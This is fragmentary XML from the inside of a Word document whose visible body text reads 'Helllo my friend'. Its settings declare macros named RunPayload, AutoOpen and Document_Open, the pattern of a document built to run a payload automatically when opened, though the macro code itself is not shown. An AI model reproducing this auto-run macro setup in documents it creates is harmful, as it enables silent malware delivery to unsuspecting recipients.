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3C2251" w14:textId="5493ACBC" w:rsidR="00A40B5A" w:rsidRDefault="008C51A4">
      <w:r>
        <w:t>Helllo my friend</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A40B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1A4"/>
    <w:rsid w:val="00782D79"/>
    <w:rsid w:val="008C51A4"/>
    <w:rsid w:val="00A40B5A"/>
    <w:rsid w:val="00C903A6"/>
    <w:rsid w:val="00EA2A16"/>
    <w:rsid w:val="00F37E05"/>
    <w:rsid w:val="00F65DED"/>
    <w:rsid w:val="00FB5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55A8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51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51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51A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51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51A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51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51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51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51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51A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51A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51A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51A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51A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51A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51A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51A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51A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51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51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51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51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51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51A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51A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51A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51A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51A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51A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RUNPAYLOAD" wne:name="TemplateProject.NewMacros.RunPayload" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="TEMPLATEPROJECT.NEWMACROS.AUTOOPEN" wne:name="TemplateProject.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="TEMPLATEPROJECT.NEWMACROS.DOCUMENT_OPEN" wne:name="Template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hel1.dotm</Template>
  <TotalTime>1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2025-07-01T09:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-01T09:23:00Z</dcterms:modified>
</cp:coreProperties>
</file>